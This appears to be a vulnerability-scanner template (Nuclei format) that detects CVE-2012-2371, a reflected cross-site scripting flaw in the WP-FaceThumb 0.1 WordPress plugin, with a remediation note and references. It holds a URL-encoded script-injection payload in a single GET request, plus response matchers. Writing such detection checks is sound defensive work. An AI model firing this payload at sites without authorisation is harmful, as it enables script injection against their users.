52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: CVE-2012-2371
|
|
|
|
info:
|
|
name: WP-FaceThumb 0.1 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
|
|
remediation: |
|
|
Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-2371
|
|
- http://www.openwall.com/lists/oss-security/2012/05/15/12
|
|
- http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html
|
|
- http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79
|
|
- http://www.openwall.com/lists/oss-security/2012/05/16/1
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2012-2371
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00605
|
|
epss-percentile: 0.76267
|
|
cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: mnt-tech
|
|
product: wp-facethumb
|
|
tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502202ea0ede2f243d5fe822113b6a861cb01ff29986fa02bf192010060256ced9c00022100ca48214e1c7af9223704ff095273f3777914634d50f0ef7843ed0f9c629e82b6:922c64590222798bb761d5b6d8e72950
|